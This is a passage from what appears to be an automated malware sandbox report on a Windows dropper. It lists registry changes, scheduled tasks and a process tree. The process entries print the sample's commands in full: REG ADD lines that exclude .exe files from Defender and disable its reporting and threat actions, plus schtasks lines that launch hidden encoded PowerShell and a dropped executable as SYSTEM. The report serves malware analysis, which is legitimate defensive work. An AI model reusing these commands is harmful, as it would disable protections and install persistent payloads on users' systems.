| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS79E3.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1541411d-0000-0000-0000-d01200000000} | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\bafqIoM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zS79E3.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS7BB8.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpjsJyudk" /SC once /ST 02:57:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpjsJyudk"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpjsJyudk"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe\" sw /site_id 525403 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe
C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\lGXdzfP.exe sw /site_id 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
